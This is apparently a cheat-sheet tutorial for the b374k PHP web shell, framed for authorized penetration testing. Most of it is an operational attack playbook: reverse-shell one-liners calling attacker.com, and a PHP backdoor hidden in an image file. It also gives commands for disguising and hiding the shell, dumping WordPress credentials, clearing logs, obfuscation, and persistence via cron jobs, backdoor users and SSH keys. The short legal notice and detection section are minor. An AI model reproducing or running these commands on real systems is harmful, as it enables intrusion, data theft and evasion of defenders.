Overview
b374k is a sophisticated PHP web shell used in penetration testing and post-exploitation scenarios. It provides file management, command execution, database interaction, and various network utilities through a single obfuscated PHP file. b374k offers both a web interface and command-line capabilities, making it useful for maintaining access and gathering intelligence on compromised systems.
Understanding b374k
What is b374k?
b374k (originally named “b374k Shell”) is a single-file PHP application that provides:
- Web-based file manager and editor
- Command execution and reverse shell capabilities
- MySQL/database client
- Network utilities (port scanning, network analysis)
- PHP information gathering
- Log file manipulation
- System information collection
Legal Notice
b374k is used exclusively in authorized penetration testing and lawful security assessments. Unauthorized access to computer systems is illegal. Always obtain written authorization before using b374k in any context.
Installation and Setup
Obtaining b374k
# Clone from repository (if available)
git clone https://github.com/bl4ckh4t/b374k b374k-shell
# Or download from source
wget https://raw.githubusercontent.com/bl4ckh4t/b374k/master/shell.php
# Or find from legitimate security tool repositories
# (Only for authorized penetration testing)
Deploying to Web Server
# Upload to web-accessible directory
scp shell.php user@target.com:/var/www/html/admin/
# Or copy to compromised server
cp shell.php /var/www/html/
# Or embed in other files
cat shell.php >> legitimate_file.php
File Naming Best Practices
# Use inconspicuous filenames
cp shell.php error.php
cp shell.php index.php
cp shell.php upload.php
# Place in hidden directories
mkdir -p /var/www/html/.git/
cp shell.php /var/www/html/.git/shell.php
Web Interface Access
Basic Access
# Access through browser
http://target.com/shell.php
# With authentication
http://username:password@target.com/shell.php
# Through proxies
http://target.com/shell.php?proxy=http://proxy:8080
Authentication Setup
# b374k may require authentication
# Default credentials vary by version
# Common defaults: admin/admin, shell/shell
# Change password in PHP source
$AUTH_PASSWORD = 'newpassword';
# Bypass authentication (if vulnerable version)
# Some versions have authentication bypass vulnerabilities
File Management
Browsing Files and Directories
| Feature | Description |
|---|
| File listing | View directory contents with permissions |
| File preview | View text files in web interface |
| Download | Download files from server to attacker machine |
| Upload | Upload files to server |
| Edit | Edit text files inline |
| Delete | Remove files from system |
| Rename | Rename files and directories |
| Permissions | Change file permissions (chmod) |
File Operations
# Download sensitive files through interface
# Click file → Download
# Edit PHP files
# Click file → Edit → Modify code → Save
# Create new files
# New File button → Enter filename → Write content
# Delete logs
# Click access_log → Delete
# Change permissions on script
# Click script.php → Permissions → 755 → Apply
Uploading Backdoors
# Upload additional PHP shells
# Upload button → Select file → Upload
# Upload compiled binaries
# Upload button → netcat binary → Upload to /tmp/
# Upload multiple files at once
# Select multiple files → Batch upload
Command Execution
Basic Command Execution
| Command | Purpose |
|---|
id | Get current user and group information |
whoami | Display current user |
pwd | Show current working directory |
ls -la | List files with detailed permissions |
uname -a | Display system information |
netstat -tulnp | Show listening ports and processes |
ps aux | List all running processes |
Command Execution Examples
# Through web interface command tab
# Enter: cat /etc/passwd
# Execute
# Through command line if accessible
php -r 'system("id");'
# Chained commands
cat /etc/hosts && whoami && pwd
# Pipe output to tools
cat /etc/sudoers | grep NOPASSWD
Privilege Escalation Checks
# Check sudo privileges
sudo -l
# Find SUID binaries
find / -perm -4000 2>/dev/null
# Check kernel version
uname -a
# Look for writable files
find /tmp -type f -writable 2>/dev/null
Reverse Shell Integration
Reverse Shell Execution
# Bash reverse shell
bash -i >& /dev/tcp/attacker.com/4444 0>&1
# Python reverse shell
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("attacker.com",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);subprocess.call(["/bin/sh","-i"])'
# Netcat reverse shell
nc attacker.com 4444 -e /bin/bash
Listener Setup
# On attacker machine
nc -nlvp 4444
# Using socat
socat file:`tty`,raw,echo=0 TCP-LISTEN:4444
# Using metasploit handler
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST attacker.com
set LPORT 4444
exploit
Database Client Functions
Connecting to Databases
# MySQL connection
Host: localhost
User: root
Password: rootpass
Port: 3306
Database: wordpress
# Click Connect button in web interface
Database Operations
| Operation | Description |
|---|
| List databases | View all available databases |
| Select database | Choose database to query |
| List tables | View tables in database |
| Execute query | Run arbitrary SQL queries |
| Export data | Dump database contents |
| Modify data | Insert/update/delete records |
SQL Injection and Data Extraction
-- List all databases
SHOW DATABASES;
-- Select database
USE wordpress;
-- List tables
SHOW TABLES;
-- Dump user credentials
SELECT user_login, user_pass FROM wp_users;
-- Extract email addresses
SELECT user_email FROM wp_users;
-- Modify admin password
UPDATE wp_users SET user_pass=MD5('newpassword') WHERE ID=1;
Network Utilities
Port Scanning
# Scan target host
Host: 192.168.1.1
Port range: 1-65535
Type: TCP/UDP
# Common ports
80, 443, 22, 21, 3306, 5432, 8080, 8888
Network Enumeration
# Get network interfaces
ifconfig / ip addr
# Get routing table
route / ip route
# DNS lookup
nslookup domain.com
host domain.com
# Traceroute
traceroute example.com
| Command | Information |
|---|
phpinfo() | Complete PHP configuration |
php -v | PHP version |
extension_loaded() | Check for extensions |
php.ini | View PHP configuration file |
disable_functions | List disabled functions |
Checking Capabilities
# Check if exec is disabled
php -r 'echo ini_get("disable_functions");'
# List loaded extensions
php -r 'print_r(get_loaded_extensions());'
# Check safe_mode status
php -r 'echo ini_get("safe_mode");'
# Get memory limit
php -r 'echo ini_get("memory_limit");'
Log Manipulation and Cover
Viewing Logs
# Apache access log
/var/log/apache2/access.log
/var/log/httpd/access_log
# Apache error log
/var/log/apache2/error.log
/var/log/httpd/error_log
# PHP error log
/var/log/php-fpm.log
/var/log/php.log
# System authentication log
/var/log/auth.log
/var/log/secure
Log Clearing Commands
# Clear Apache access logs
echo "" > /var/log/apache2/access.log
# Clear auth logs (if root)
echo "" > /var/log/auth.log
# Clear PHP errors
echo "" > /var/log/php.log
# Truncate syslog
truncate -s 0 /var/log/syslog
Customization and Obfuscation
Modifying Source Code
// Change authentication password
$AUTH_PASSWORD = 'ComplexPassword123!';
// Disable certain functions
$DISABLED_FUNCTIONS = array('system', 'exec');
// Change interface appearance
$INTERFACE_COLOR = '#333333';
// Limit accessible directories
$ROOT_DIR = '/var/www/';
Obfuscation Techniques
# Base64 encode the entire shell
base64 shell.php > shell.b64
# PHP obfuscation
php_strip_whitespace() - remove comments
# Variable renaming
$_POST -> $____P0ST
# String concatenation
"system" -> "sys"."tem"
Persistence Techniques
Creating Backdoors
# Add shell to cron jobs
(crontab -l 2>/dev/null; echo "* * * * * php /tmp/shell.php") | crontab -
# Insert into Apache config
echo "RewriteRule ^(.*)$ /shell.php [L]" >> /etc/apache2/.htaccess
# Hide in image files
echo "<?php system($_POST['cmd']); ?>" >> image.jpg
Alternative Access Points
# Hidden .htaccess shell
<FilesMatch "image\.jpg">
SetHandler application/x-httpd-php
</FilesMatch>
# Hidden PHP files
.git/shell.php
.svn/shell.php
uploads/shell.php
wp-content/plugins/shell.php
Post-Exploitation Workflows
# 1. Check current user and permissions
whoami && id
# 2. Enumerate system
uname -a && cat /etc/os-release
# 3. Find sensitive files
find /home -name "*.txt" -o -name "*.sql" 2>/dev/null
# 4. Check database access
mysql -u root -p -e "SHOW DATABASES;"
Lateral Movement
# 1. Find SSH keys
find / -name "id_rsa" -o -name "authorized_keys" 2>/dev/null
# 2. Check network connectivity
netstat -tulnp | grep LISTEN
# 3. Scan internal network
nmap -sn 192.168.1.0/24
# 4. Check ARP cache
arp -a
Persistence Establishment
# 1. Create system user
useradd -m -s /bin/bash backdoor
# 2. Add SSH key
mkdir -p /home/backdoor/.ssh/
echo "ssh-rsa AAAA..." > /home/backdoor/.ssh/authorized_keys
# 3. Add cron job
(crontab -l; echo "*/5 * * * * /tmp/agent.sh") | crontab -
# 4. Verify persistence
crontab -l && cat ~/.ssh/authorized_keys
Security Detection and Evasion
Detection Methods
# Look for b374k signatures
grep -r "b374k" /var/www/
# Check for suspicious PHP files
find /var/www -name "*.php" -mtime -1
# Monitor web server logs
tail -f /var/log/apache2/access.log | grep "shell\|cmd\|execute"
# Check process lists
ps aux | grep php | grep -v apache
Evasion Techniques
# Use non-standard ports
# Access through 8080, 8888, or custom ports
# Obfuscate filename
mv shell.php assets_loader.php
# Hide in legitimate directories
cp shell.php /var/www/html/wp-admin/temp.php
# Use URL encoding
http://target.com/shell.php?cmd=id%20%26%26%20cat%20/etc/passwd
Troubleshooting
Common Issues
| Issue | Solution |
|---|
| 404 File Not Found | Verify upload location and filename |
| Permission Denied | Check file permissions (should be readable) |
| Functions Disabled | Check php.ini disable_functions setting |
| Database Connection Failed | Verify credentials and network access |
| Authentication Failed | Check password in source code |
Debugging
# Check PHP errors
tail -f /var/log/php-fpm.log
# Test PHP execution
php -r 'echo "PHP works";'
# Verify web server access
curl http://target.com/shell.php
# Check disable_functions
curl http://target.com/shell.php?info
Best Practices for Authorized Testing
Documentation
# Record all access timestamps
# Log all commands executed
# Document findings and data accessed
# Maintain audit trail of activities
Cleanup
# Remove shell file
rm /var/www/html/shell.php
# Clear logs of access
# Restore original file permissions
# Remove added user accounts
# Delete cron jobs
Reporting
Document:
- How shell was deployed
- Access methods used
- Commands executed
- Data accessed
- Recommendations for remediation
- Timeline of activities
Alternatives and Comparisons
| Tool | Comparison |
|---|
| Weevely | Python-based, more obfuscated, smaller shell |
| JSP Shells | Java-based, for Java application servers |
| ASP.NET Shells | Windows-focused, requires .NET framework |
| Reverse Shell Scripts | Simpler but less feature-rich |
References and Further Learning
- Original repository documentation
- OWASP Web Application Security Testing Guide
- Penetration Testing Execution Standard (PTES)
- CWE-94: Improper Control of Generation of Code
- MITRE ATT&CK: T1190 Exploit Public-Facing Application
